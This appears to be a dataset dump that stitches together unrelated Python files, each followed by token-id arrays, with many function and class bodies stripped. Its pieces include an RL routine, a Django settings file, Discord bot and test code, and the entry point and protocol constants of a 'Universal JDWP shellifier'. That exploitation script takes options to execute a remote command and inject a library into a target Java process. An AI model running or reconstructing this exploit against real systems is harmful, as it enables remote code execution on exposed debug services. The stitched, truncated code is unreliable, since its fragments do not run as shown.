in which case the sub items dont have a prefix.
example if location = '<parent_folder>/<file_prefix>'
parent_folder/
|-file_prefix<sep>singlefile_sub_item1.<ext>
|-file_prefix<sep>singlefile_sub_item2.<ext>
|-file_prefix<sep>multifile_sub_item3<sep>singlesub1.<ext>
|-file_prefix<sep>multifile_sub_item3<sep>singlesub2.<ext>
example if location = '<parent_folder>/
parent_folder/
|-singlefile_sub_item1.<ext>
|-singlefile_sub_item2.<ext>
|-multifile_sub_item3<sep>singlesub1.<ext>
|-multifile_sub_item3<sep>singlesub2.<ext>
:param parent_location: the absolute file prefix of the parent item. It may be a folder (special case of the
root folder) but typically is just a file prefix
:param no_errors:
:return: a dictionary of <item_name>, <item_path>
"""
if parent_location == '':
parent_location = '.'
# (1) Find the base directory and base name
if isdir(parent_location): # special case: parent location is the root folder where all the files are.
parent_dir = parent_location
base_prefix = ''
start_with = ''
else:
parent_dir = dirname(parent_location)
if parent_dir is '':
parent_dir = '.'
# TODO one day we'll rather want to have a uniform definition of 'location' across filemappings
# Indeed as of today, location is not abstract from the file mapping implementation, since we
# "just" use basename() rather than replacing os separators with our separator:
base_prefix = basename(parent_location) # --> so it should already include self.separator to be valid
start_with = self.separator
# (2) list children files that are singlefiles
content_files = [content_file for content_file in listdir(parent_dir)
# -> we are in flat mode : should be a file not a folder :
if isfile(join(parent_dir,content_file))
# -> we are looking for children of a specific item :
and content_file.startswith(base_prefix)
# -> we are looking for multifile child items only :
and content_file != base_prefix
# -> they should start with the separator (or with nothing in case of the root folder) :
and (content_file[len(base_prefix):]).startswith(start_with)
# -> they should have a valid extension :
and (content_file[len(base_prefix + start_with):]).count(EXT_SEPARATOR) >= 1
]
# (3) build the resulting dictionary of item_name > item_prefix
item_prefixes = dict()
for item_file in content_files:
end_name = item_file.find(self.separator, len(base_prefix + start_with))
if end_name == -1:
end_name = item_file.find(EXT_SEPARATOR, len(base_prefix + start_with))
item_name = item_file[len(base_prefix + start_with):end_name]
item_prefixes[item_name] = join(parent_dir, base_prefix + start_with + item_name)
return item_prefixes
def is_multifile_object_without_children(self, location: str) -> bool:
"""
Returns True if an item with this location is present as a multifile object without children.
For this implementation, this means that there is a file with the appropriate name but without extension
:param location:
:return:
"""
# (1) Find the base directory and base name
if isdir(location): # special case: parent location is the root folder where all the files are.
return len(self.find_multifile_object_children(location)) == 0
else:
# TODO same comment than in find_multifile_object_children
if exists(location):
# location is a file without extension. We can accept that as being a multifile object without children
return True
else:
return False
def get_multifile_object_child_location(self, parent_location: str, child_name: str):
"""
Implementation of the parent abstract method.
In this mode the attribute is a file with the same prefix, separated from the parent object name by
the character sequence <self.separator>
:param parent_location: the absolute file prefix of the parent item.
:param child_name:
:return: the file prefix for this attribute
"""
check_var(parent_location, var_types=str, var_name='parent_path')
check_var(child_name, var_types=str, var_name='item_name')
# a child location is built by adding the separator between the child name and the parent location
return parent_location + self.separator + child_name
def find_simpleobject_file_occurrences(self, location) -> Dict[str, str]:
"""
Implementation of the parent abstract method.
:param location:
:return: a dictionary{ext : file_path}
"""
parent_dir = dirname(location)
if parent_dir is '':
parent_dir = '.'
base_prefix = basename(location)
# trick : is sep_for_flat is a dot, we have to take into account that there is also a dot for the extension
min_sep_count = (1 if self.separator == EXT_SEPARATOR else 0)
possible_object_files = {object_file[len(base_prefix):]: join(parent_dir, object_file)
for object_file in listdir(parent_dir) if isfile(parent_dir + '/' + object_file)
and object_file.startswith(base_prefix)
# file must be named base_prefix.something
and object_file != base_prefix
and object_file[len(base_prefix)] == EXT_SEPARATOR
and (object_file[len(base_prefix):]).count(EXT_SEPARATOR) == 1
# and no other item separator should be present in the something
and (object_file[len(base_prefix):]).count(self.separator) == min_sep_count}
return possible_object_files
| [
6738,
450,
66,
1330,
12531,
24396,
11,
9738,
48526,
198,
6738,
18931,
1330,
5972,
1362,
198,
6738,
28686,
1330,
1351,
15908,
11,
41767,
198,
6738,
28686,
13,
6978,
1330,
318,
7753,
11,
4654,
11,
318,
15908,
11,
26672,
3672,
11,
1615,
... | 2.387545 | 14,308 |
#!/usr/bin/python
import gym
from gym import wrappers
import argparse
import numpy as np
def value_iteration(env, theta=0.0001, discount_factor=1.0):
"""
Value Iteration Algorithm.
Args:
env: OpenAI environment.
env.P represents the transition probabilities of the environment.
theta: Stopping threshold.
If the value of all states changes less than theta
in one iteration we are done.
discount_factor: lambda time discount factor.
Returns:
A tuple (policy, V) of the optimal policy and the optimal value function.
"""
def one_step_lookahead(state, V):
"""
Helper function to calculate the value for all action in a given state.
Args:
state: The state to consider (int)
V: The value to use as an estimator, Vector of length env.observation_space.n
Returns:
A vector of length env.action_space.n`
containing the expected value of each action.
"""
A = np.zeros(env.action_space.n)
for a in range(env.action_space.n):
for prob, next_state, reward, done in env.env.env.P[state][a]:
A[a] += prob * (reward + discount_factor * V[next_state])
return A
V = np.zeros(env.observation_space.n)
while True:
# Stopping condition
delta = 0
# Update each state...
for s in range(env.observation_space.n):
# Do a one-step lookahead to find the best action
A = one_step_lookahead(s, V)
best_action_value = np.max(A)
# Calculate delta across all states seen so far
delta = max(delta, np.abs(best_action_value - V[s]))
# Update the value function
V[s] = best_action_value
# Check if we can stop
if delta < theta:
break
# Create a deterministic policy using the optimal value function
policy = np.zeros([env.observation_space.n, env.action_space.n])
for s in range(env.observation_space.n):
# One step lookahead to find the best action for this state
A = one_step_lookahead(s, V)
best_action = np.argmax(A)
# Always take the best action
policy[s, best_action] = 1.0
return policy, V
if __name__ == '__main__':
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
11748,
11550,
198,
6738,
11550,
1330,
7917,
11799,
198,
11748,
1822,
29572,
198,
11748,
299,
32152,
355,
45941,
628,
198,
4299,
1988,
62,
2676,
341,
7,
24330,
11,
262,
8326,
28,
15,
13,
... | 2.325147 | 1,018 |
#!/usr/bin/python
################################################################################
#
# Universal JDWP shellifier
#
# @_hugsy_
#
# And special cheers to @lanjelot
#
# loadlib option by @ikoz
#
import argparse
import json
import logging
import logging.config
import os
import socket
import struct
import sys
import time
import traceback
import urllib
################################################################################
#
# JDWP protocol variables
#
HANDSHAKE = "JDWP-Handshake"
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80
# Command signatures
VERSION_SIG = (1, 1)
CLASSESBYSIGNATURE_SIG = (1, 2)
ALLCLASSES_SIG = (1, 3)
ALLTHREADS_SIG = (1, 4)
IDSIZES_SIG = (1, 7)
CREATESTRING_SIG = (1, 11)
SUSPENDVM_SIG = (1, 8)
RESUMEVM_SIG = (1, 9)
SIGNATURE_SIG = (2, 1)
FIELDS_SIG = (2, 4)
METHODS_SIG = (2, 5)
GETVALUES_SIG = (2, 6)
CLASSOBJECT_SIG = (2, 11)
INVOKESTATICMETHOD_SIG = (3, 3)
REFERENCETYPE_SIG = (9, 1)
INVOKEMETHOD_SIG = (9, 6)
STRINGVALUE_SIG = (10, 1)
THREADNAME_SIG = (11, 1)
THREADSUSPEND_SIG = (11, 2)
THREADRESUME_SIG = (11, 3)
THREADSTATUS_SIG = (11, 4)
EVENTSET_SIG = (15, 1)
EVENTCLEAR_SIG = (15, 2)
EVENTCLEARALL_SIG = (15, 3)
# Other codes
MODKIND_COUNT = 1
MODKIND_THREADONLY = 2
MODKIND_CLASSMATCH = 5
MODKIND_LOCATIONONLY = 7
EVENT_BREAKPOINT = 2
SUSPEND_EVENTTHREAD = 1
SUSPEND_ALL = 2
NOT_IMPLEMENTED = 99
VM_DEAD = 112
INVOKE_SINGLE_THREADED = 2
TAG_OBJECT = 76
TAG_STRING = 115
TYPE_CLASS = 1
################################################################################
#
# JDWP client class
#
if __name__ == "__main__":
logger = setup_logging(default_path=os.path.join(os.getcwd(), 'logging.json'))
if sys.version > '3':
logger.error("Currently only supports python2!")
parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True)
parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port")
parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD",
default="java.net.ServerSocket.accept", help="Specify full path to method to break on")
parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND",
help="Specify command to execute remotely")
parser.add_argument("--loadlib", dest="loadlib", type=str, metavar="LIBRARYNAME",
help="Specify library to inject into process load")
args = parser.parse_args()
class_name, method_name = path_parse(args.break_on)
setattr(args, "break_on_class", class_name)
setattr(args, "break_on_method", method_name)
ret_code = 0
try:
cli = JDWPClient(args.target, args.port)
cli.start()
if not runtime_exec(cli, args):
logger.error("[-] Exploit failed")
ret_code = 1
except KeyboardInterrupt:
logger.error("[+] Exiting on user's request")
except Exception as e:
logger.error("[-] Exception: %s" % e)
traceback.print_exc()
ret_code = 1
cli = None
finally:
if cli:
cli.leave()
sys.exit(ret_code)
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
29113,
29113,
14468,
198,
2,
198,
2,
14499,
28591,
25527,
7582,
7483,
198,
2,
198,
2,
2488,
62,
71,
1018,
1837,
62,
198,
2,
198,
2,
843,
2041,
34550,
284,
2488,
9620,
73,
417,
313,
198,
... | 2.390106 | 1,415 |
import pandas as pd
import trackintel as ti
import trackintel.preprocessing.positionfixes
import trackintel.visualization.positionfixes
import trackintel.io.postgis
@pd.api.extensions.register_dataframe_accessor("as_positionfixes")
class PositionfixesAccessor(object):
"""A pandas accessor to treat (Geo)DataFrames as collections of positionfixes. This
will define certain methods and accessors, as well as make sure that the DataFrame
adheres to some requirements.
Requires at least the following columns:
``['user_id', 'tracked_at', 'elevation', 'accuracy', 'geom']``
Examples
--------
>>> df.as_positionfixes.extract_staypoints()
"""
required_columns = ['user_id', 'tracked_at', 'elevation', 'accuracy', 'geom']
@staticmethod
@property
def center(self):
"""Returns the center coordinate of this collection of positionfixes."""
lat = self._obj.latitude
lon = self._obj.longitude
return (float(lon.mean()), float(lat.mean()))
def extract_staypoints(self, *args, **kwargs):
"""Extracts staypoints from this collection of positionfixes.
See :func:`trackintel.preprocessing.positionfixes.extract_staypoints`."""
return ti.preprocessing.positionfixes.extract_staypoints(self._obj, *args, **kwargs)
def extract_triplegs(self, *args, **kwargs):
"""Extracts triplegs from this collection of positionfixes."""
raise NotImplementedError
def extract_staypoints_and_triplegs(self, *args, **kwargs):
"""Extracts staypoints, uses them to build triplegs, and builds all associations
with the original positionfixes (i.e., returning everything in accordance with the trackintel
:doc:`/content/data_model_sql`).
Returns
-------
tuple
A tuple consisting of (positionfixes, staypoints, triplegs).
"""
raise NotImplementedError
def plot(self, *args, **kwargs):
"""Plots this collection of positionfixes.
See :func:`trackintel.visualization.positionfixes.plot_positionfixes`."""
ti.visualization.positionfixes.plot_positionfixes(self._obj, *args, **kwargs)
def to_postgis(self, conn_string, table_name):
"""Stores this collection of positionfixes to PostGIS.
See :func:`trackintel.io.postgis.store_positionfixes_postgis`."""
ti.io.postgis.write_positionfixes_postgis(self._obj, conn_string, table_name) | [
11748,
19798,
292,
355,
279,
67,
198,
11748,
2610,
48779,
355,
46668,
198,
198,
11748,
2610,
48779,
13,
3866,
36948,
13,
9150,
42624,
198,
11748,
2610,
48779,
13,
41464,
1634,
13,
9150,
42624,
198,
11748,
2610,
48779,
13,
952,
13,
7353,... | 2.796149 | 883 |
import os
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
SECRET_KEY = os.environ.get("CODESPARK_SECRET_KEY")
DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"sass_processor",
"web",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
"sass_processor.finders.CssFinder",
]
SASS_PROCESSOR_AUTO_INCLUDE = False
ROOT_URLCONF = "codespark.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "codespark.wsgi.application"
DATABASES = {
"default": {
"ENGINE": "django.db.backends.mysql",
"NAME": "Codespark",
"USER": os.environ.get("DJANGO_MYSQL_USER"),
"PASSWORD": os.environ.get("DJANGO_MYSQL_PASSWORD"),
"HOST": "localhost",
"PORT": "3306",
}
}
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = "pt-br"
TIME_ZONE = "UTC"
USE_I18N = True
USE_TZ = True
STATIC_URL = "static/"
STATICFILES_DIRS = [
BASE_DIR / "dist",
"/var/www/static/"
]
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
LOGIN_URL = "/login"
STATIC_ROOT = "static/"
| [
11748,
28686,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
33,
11159,
62,
34720,
796,
10644,
7,
834,
7753,
834,
737,
411,
6442,
22446,
8000,
13,
8000,
198,
198,
2,
4091,
3740,
1378,
31628,
13,
28241,
648,
404,
305,
752,
13,
785,
14... | 2.202724 | 1,248 |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 13 11:45:44 2018
@author: 13383861
"""
import sys
sys.path.append('..')
sys.path.append('.')
import typing
import functools
from Utils.AgentObservation import AgentObservation
from Utils.UE4Coord import UE4Coord
from Utils.UE4Grid import UE4Grid
from Utils.BeliefMap import create_belief_map
class ObservationSetManager:
'''
Manages the sensor measurements of other agents. Observations don't have to be taken at disrete locations -
the continuous position can be recorded and the grid location inferred from this.
Calculating a belief map from these sets of observations requires a grid so that each recorded observation can
be
'''
#really strange behaviour: using this initialises the class with observations that don't exist... self.observation_sets[rav_name] = set()
def init_rav_observation_set(self, rav_name, observations = None):
'''initialise a new list of observations for a RAV'''
if not observations:
self.observation_sets[rav_name] = set()
else:
self.observation_sets[rav_name] = observations
def get_observation_set(self, rav_name) -> typing.Set[AgentObservation]:
'''Get list of observations from a RAV'''
return self.observation_sets[rav_name]
def update_from_other_obs_list_man(self, other):
'''Might need to check that the timestamps must be different...'''
for rav_name, observation_set in other.observation_sets.items():
self.update_rav_obs_set(rav_name, observation_set)
def get_discrete_belief_map_from_observations(self, grid):
'''Given a descrete grid, returns a belief map containing the likelihood of the source
being contained in each grid segment'''
#ToDo:
#Currently observations must be made at grid locations - instead compute which observations are made
#in each grid location and then compute the belief map
return_belief_map = create_belief_map(grid, self.agent_name)
return_belief_map.update_from_observations(self.get_all_observations())
return return_belief_map
def get_continuous_belief_map_from_observations(self, grid_bounds):
'''Given grid bounds, returns a function which returns the likelihood given the
continuous position of the RAV. I.E. transform the discrete PDF as above to a
continuous one.'''
pass
if __name__ == "__main__":
test_grid = UE4Grid(1, 1, UE4Coord(0,0), 6, 5)
test_ObservationSetManager = ObservationSetManager('agent1')
test_ObservationSetManager.observation_sets
obs1 = AgentObservation(UE4Coord(0,0),0.5, 1, 1234, 'agent2')
obs2 = AgentObservation(UE4Coord(0,0),0.7, 2, 1235, 'agent2')
obs3 = AgentObservation(UE4Coord(0,1),0.95, 3, 1237, 'agent2')
obs4 = AgentObservation(UE4Coord(0,1),0.9, 3, 1238, 'agent1')
test_ObservationSetManager.init_rav_observation_set('agent2', set([obs1, obs2]))
test_ObservationSetManager.observation_sets
test_ObservationSetManager.update_rav_obs_set('agent2', set([obs3]))
test_ObservationSetManager.get_all_observations()
assert test_ObservationSetManager.get_observation_set('agent2') == set([obs1, obs2, obs3]), "agent2 observations should have been added to set"
assert test_ObservationSetManager.get_observation_set('agent1') == set([]), "agent1 observations should be empty"
test_ObservationSetManager.update_with_obseravation(obs4)
assert not test_ObservationSetManager.get_all_observations().difference(set([obs1, obs2, obs3, obs4]))
###################################################
# Check that duplicate observations aren't added
test_grid = UE4Grid(1, 1, UE4Coord(0,0), 6, 5)
test1_ObservationSetManager = ObservationSetManager('agent1')
obs1 = AgentObservation(UE4Coord(0,0),0.5, 1, 1234, 'agent2')
obs2 = AgentObservation(UE4Coord(0,0),0.7, 2, 1235, 'agent2')
obs3 = AgentObservation(UE4Coord(0,1),0.95, 3, 1237, 'agent2')
test1_ObservationSetManager.update_rav_obs_set('agent2',[obs1, obs2, obs3])
test1_ObservationSetManager.observation_sets
#test that duplicate measurements won't occur
obs4 = AgentObservation(UE4Coord(0,1),0.95, 3, 1237, 'agent2')
test1_ObservationSetManager.update_rav_obs_set('agent2', set([obs4]))
assert test1_ObservationSetManager.get_observation_set('agent2') == set([obs1, obs2, obs3]), "Duplicated observations should be ignored"
assert abs(test1_ObservationSetManager.get_discrete_belief_map_from_observations(test_grid).get_belief_map_component(UE4Coord(0,0)).likelihood - 0.074468) < 0.0001
assert abs(test1_ObservationSetManager.get_discrete_belief_map_from_observations(test_grid).get_belief_map_component(UE4Coord(0,1)).likelihood - 0.395833) < 0.0001
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
30030,
5267,
1511,
1367,
25,
2231,
25,
2598,
2864,
198,
198,
31,
9800,
25,
1511,
2548,
2548,
5333,
198,
37811,
198,
198,
11748,
25064,
198,
17597... | 2.607595 | 1,896 |
# CARD CLASSES #
# AIR #
class EagleCard:
"""Eagle (air, instant) - gain one point instantly, plus two points for each totem block under it"""
class CraneCard:
"""Crane (air, EoG) - gain one point, and additional two points for every crane in a diagonal from it"""
class OwlCard:
"""Owl (air, instant) - one point, aditional 2 points for every mouse, snake or Tortoise in this totem"""
class HummingbirdCard:
"""Hummingbird (air, instant) - 4 points if placed second in a totem, otherwise just one"""
class MagpieCard:
"""Magpie (air, instant) - get one point, and one additional point for all air types on your board"""
# EARTH #
class BearCard:
"""Bear (earth, EoG) - if its alone in its totem at the end, get 5 points, otherwise two points"""
class WolfCard:
"""Vlk (earth, instant) - get points: amount of wolves on board x2"""
class FoxCard:
"""Liška (earth, EoG) - if it's in your totem at least twice +4 points (for each), otherwise -3"""
class LynxCard:
"""Lynx (earth, EoG) - get half a point for any mice, fish, foxes and magpies in a one block radius of it"""
class MouseCard:
"""Mouse (earth, EoG) - one point, plus one point for any mice in a one block radius of it"""
# FIRE #
class SnakeCard:
"""Snake (fire, instant) - one point, additional three points for any mice in its totem"""
class ChameleonCard:
"""Chameleon (fire, instant) - one point, is counted as an appropriate animal in further instant effects"""
class CrocodileCard:
"""Crocodile (fire, instant) - one point, add two points for every water animal in its row"""
class TortoiseCard:
"""Tortoise (fire, instant) - one point, plus one point for any other tortoises in its totem or row"""
class GecoCard:
"""Geco (fire, EoG) - one point for every represented element in its totem, six if all are represented"""
# WATER #
class SharkCard:
"""Shark (water, EoG) - one point, plus one point for every totem block under it"""
class CrabCard:
"""Crab (water, EoG) - one point, additional 2 points for any crab in the same row"""
class OctopusCard:
"""Octopus (water, EoG) - copies an EoG card from its totem which yields the most points"""
class FishCard:
"""Fish (water, instant) - five points, but two deducted for any other element in this totem"""
class JellyfishCard:
"""Jellyfish (water, instant) - one point, plus one point for every empty space above it"""
# END OF CARD CLASSES #
| [
2,
48731,
42715,
1546,
1303,
198,
2,
31600,
1303,
198,
4871,
18456,
16962,
25,
198,
220,
220,
220,
37227,
36,
19345,
357,
958,
11,
9113,
8,
532,
4461,
530,
966,
11101,
11,
5556,
734,
2173,
329,
1123,
49930,
2512,
739,
340,
37811,
62... | 3.260184 | 761 |
from django.conf.urls import patterns, include, url
from manager import views
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='administrator'),
url(r'^tag', views.TagView.as_view(), name='tag'),
url(r'^updatetag/(?P<tag_id>\d+)', views.TagUpdateView.as_view(), name='updatetag'),
url(r'^updategroup/(?P<group_id>\d+)', views.GroupUpdateView.as_view(), name='updategroup'),
url(r'^updategtt/(?P<gtt_id>\d+)', views.GTTUpdateView.as_view(), name='updategtt'),
url(r'^updateinfo/(?P<gtt_id>\d+)/(?P<info_id>\d+)', views.TagInfoUpdateView.as_view(), name='updateinfo'),
# ADD
url(r'^add', views.create, name='add'),
url(r'^gttadd', views.create_gtt, name='gttadd'),
url(r'^infoadd', views.create_taginfo, name='infoadd'),
# update
url(r'^update', views.update, name='update'),
url(r'^infoupdate', views.update_taginfo, name='infoupdate'),
# delete
url(r'^delete', views.delete, name='delete'),
url(r'^gtdelete', views.del_gtt, name='gtdelete'),
url(r'^infodelete', views.del_taginfo, name='infodelete'),
] | [
6738,
42625,
14208,
13,
10414,
13,
6371,
82,
1330,
7572,
11,
2291,
11,
19016,
198,
6738,
4706,
1330,
5009,
198,
198,
6371,
33279,
82,
796,
685,
628,
220,
220,
220,
19016,
7,
81,
6,
61,
3,
3256,
5009,
13,
15732,
7680,
13,
292,
62,
... | 2.383948 | 461 |
import time
from datetime import datetime
import cairosvg
import gevent
import markovify
import psycopg2
import pygal
from disco.types.channel import Channel as DiscoChannel, MessageIterator, ChannelType
from disco.types.guild import Guild as DiscoGuild
from disco.types.message import MessageTable
from disco.types.permissions import Permissions
from disco.types.user import User as DiscoUser
from disco.util.emitter import Priority
from disco.util.snowflake import to_datetime, from_datetime
from gevent.pool import Pool
from rowboat.models.channel import Channel
from rowboat.models.guild import GuildEmoji, GuildVoiceSession
from rowboat.models.message import Message, Reaction
from rowboat.models.user import User
from rowboat.plugins import RowboatPlugin as Plugin, CommandFail, CommandSuccess
from rowboat.sql import database
from rowboat.tasks.backfill import backfill_channel, backfill_guild
from rowboat.util.input import parse_duration
from rowboat.util.reqaddons import DiscordStyle
| [
11748,
640,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
198,
11748,
1275,
72,
4951,
45119,
198,
11748,
4903,
1151,
198,
11748,
1317,
709,
1958,
198,
11748,
17331,
22163,
70,
17,
198,
11748,
12972,
13528,
198,
6738,
4655,
13,
19199,
13... | 3.831418 | 261 |
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from mymoney.core.validators import MinMaxValidator
from mymoney.tags.models import Tag
from mymoney.tags.serializers import TagSerializer
| [
6738,
42625,
14208,
13,
26791,
13,
41519,
1330,
334,
1136,
5239,
62,
75,
12582,
355,
4808,
198,
198,
6738,
1334,
62,
30604,
1330,
11389,
11341,
198,
198,
6738,
616,
26316,
13,
7295,
13,
12102,
2024,
1330,
1855,
11518,
47139,
1352,
198,
... | 3.651515 | 66 |
import os
import sys
import discord
from discord.ext import commands
import keep_alive
intents = discord.Intents.all()
bot = commands.Bot(command_prefix='?', intents=intents)
@bot.event
@bot.command()
@commands.has_any_role('總召')
@bot.command()
@commands.has_any_role('總召')
@bot.command()
@commands.has_any_role('總召')
@bot.command()
@commands.has_any_role('總召')
@bot.event
for filename in os.listdir('./cogs'):
if filename.endswith('.py'):
bot.load_extension(f'cogs.{filename[:-3]}')
keep_alive.keep_alive()
if __name__ == '__main__':
bot.run(os.environ.get("TOKEN"))
| [
11748,
28686,
198,
11748,
25064,
198,
11748,
36446,
198,
6738,
36446,
13,
2302,
1330,
9729,
198,
198,
11748,
1394,
62,
282,
425,
198,
198,
600,
658,
796,
36446,
13,
5317,
658,
13,
439,
3419,
198,
13645,
796,
9729,
13,
20630,
7,
21812,... | 2.29771 | 262 |
import unittest
from nosedep import depends
| [
11748,
555,
715,
395,
198,
6738,
299,
1335,
538,
1330,
8338,
628
] | 3.75 | 12 |
import unittest
from magic_square_forming import formingMagicSquare
| [
11748,
555,
715,
395,
198,
198,
6738,
5536,
62,
23415,
62,
15464,
1330,
14583,
22975,
48011,
198
] | 4.058824 | 17 |
elevator1 = {
"num_persons":5,
"cargo_weight":0,
"floors":[0,10,11,12,13,14,17,16]
}
elevator2 = {
"num_persons":10,
"cargo_weight":150,
"floors":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,17,16]
}
elevator3 = {
"num_persons":0,
"cargo_weight":550,
"floors":[0,2,4,6,8,10,12,14,16]
}
| [
198,
198,
68,
2768,
1352,
16,
796,
1391,
198,
220,
220,
220,
366,
22510,
62,
19276,
684,
1298,
20,
11,
198,
220,
220,
220,
366,
66,
9448,
62,
6551,
1298,
15,
11,
198,
220,
220,
220,
366,
48679,
669,
20598,
15,
11,
940,
11,
1157,... | 1.630769 | 195 |
"""
tests:
- plot sol_145
"""
import os
import unittest
from cpylog import get_logger2
try:
import matplotlib # pylint: disable=unused-import
IS_MATPLOTLIB = True
except ImportError: # pragma: no cover
IS_MATPLOTLIB = False
if IS_MATPLOTLIB:
#matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
#try: # pragma: no cover
#plt.figure()
#plt.close()
#except Exception: # pragma: no cover
plt.switch_backend('Agg')
import pyNastran
from pyNastran.f06.utils import (split_float_colons, split_int_colon,
cmd_line_plot_flutter, cmd_line as cmd_line_f06)
from pyNastran.f06.parse_flutter import plot_flutter_f06, make_flutter_plots
PKG_PATH = pyNastran.__path__[0]
MODEL_PATH = os.path.join(PKG_PATH, '..', 'models')
if __name__ == '__main__': # pragma: no cover
unittest.main()
| [
37811,
198,
41989,
25,
198,
532,
7110,
1540,
62,
18781,
198,
37811,
198,
11748,
28686,
198,
11748,
555,
715,
395,
198,
6738,
31396,
2645,
519,
1330,
651,
62,
6404,
1362,
17,
198,
28311,
25,
198,
220,
220,
220,
1330,
2603,
29487,
8019,... | 2.244216 | 389 |
"""Tests for visutils.py"""
import faulthandler; faulthandler.enable()
import csv
import datetime
import shutil
#from matplotlib
import cycler
import numpy as np
import pandas as pd
from pandas._testing import assert_frame_equal
import pytest
import matplotlib.pylab as pl
from nna import visutils
from nna.tests import mock_data
from nna.tests.testparams import INPUTS_OUTPUTS_PATH
IO_visutils_path = INPUTS_OUTPUTS_PATH / 'visutils'
test_data_create_time_index = [
(
100,
'270min',
('270T',),
),
(
120,
'2H',
('2H',),
),
(
120,
'continous',
('10S',),
),
]
@pytest.mark.parametrize('row_count,output_data_freq,expected',
test_data_create_time_index)
def test_load_results():
""" test for visutils.load_npy_files.
checks shape approximatly,
checks shape of the array.
"""
tag_name = 'XXX'
channel_count = 2
row_count = 10
# file_length_limit_seconds = 1 * 60 * 60
file_properties_df = mock_data.mock_file_properties_df(row_count)
func_output_path = IO_visutils_path / 'load_results' / 'outputs'
fill_value_func = ones
resulting_output_file_paths = mock_data.mock_results_4input_files(
file_properties_df,
fill_value_func,
func_output_path,
results_tag_id=tag_name,
channel_count=channel_count,
)
results = visutils.load_npy_files(resulting_output_file_paths)
assert results.shape[0] > len(resulting_output_file_paths)
assert results.shape[1] == channel_count
shutil.rmtree(str(func_output_path))
def test_time_index_by_close_recordings():
""" Test for visutils.time_index_by_close_recordings.
"""
row_count = 1000
max_time_distance_allowed = datetime.timedelta(minutes=5)
file_properties_df = mock_data.mock_file_properties_df(row_count)
file_time_index_series = visutils.time_index_by_close_recordings(
file_properties_df,)
for m in range(len(file_time_index_series) - 1):
diff = (file_time_index_series[m + 1] - file_time_index_series[m])
assert diff >= max_time_distance_allowed
assert len(file_properties_df.index) >= len(file_time_index_series)
assert file_properties_df.timestampEnd[-1] == file_time_index_series.iloc[
-1]
assert file_properties_df.timestamp[0] == file_time_index_series.iloc[0]
return file_time_index_series, file_properties_df
def test_export_raw_results_2_csv():
""" Test for visutils.export_raw_results_2_csv.
"""
func_output_path = IO_visutils_path / 'export_raw_results_2_csv' / 'outputs'
func_input_path = IO_visutils_path / 'export_raw_results_2_csv' / 'inputs'
row_count = 100
tag_names = ['XXX']
channel_count = 1
file_properties_df = mock_data.mock_file_properties_df(row_count)
selected_location_ids = list(set(file_properties_df.locationId.values))
fill_value_func = ones
for tag_name in tag_names:
resulting_output_file_paths = mock_data.mock_results_4input_files(
file_properties_df,
fill_value_func,
func_input_path,
results_tag_id=tag_name,
channel_count=channel_count,
)
del resulting_output_file_paths
csv_files_written, no_result_paths = visutils.export_raw_results_2_csv(
func_output_path,
tag_names,
file_properties_df,
# input_data_freq="10S",
# output_data_freq="10S",
# raw2prob_threshold=0.5,
channel=channel_count,
# gathered_results_per_tag=None,
result_files_folder=func_input_path,
# prob2binary_flag=True,
)
assert not no_result_paths
assert len(csv_files_written) == len(selected_location_ids) * len(tag_names)
with open(csv_files_written[0], newline='') as f:
reader = csv.reader(f)
lines = list(reader)
header, lines = lines[0], lines[1:]
assert set(['1']) == set(i[1] for i in lines)
second = datetime.datetime.strptime(lines[11][0], '%Y-%m-%d_%H:%M:%S')
first = datetime.datetime.strptime(lines[10][0], '%Y-%m-%d_%H:%M:%S')
assert (second - first).seconds == 10
assert header[1] == csv_files_written[0].stem.split('_')[-1]
shutil.rmtree(func_input_path)
shutil.rmtree(func_output_path)
return csv_files_written, no_result_paths
def test_vis_preds_with_clipping():
'''Test vis generation.
Requires manual inspection of generated graphs.
'''
func_output_path = IO_visutils_path / 'vis_preds_with_clipping' / 'outputs'
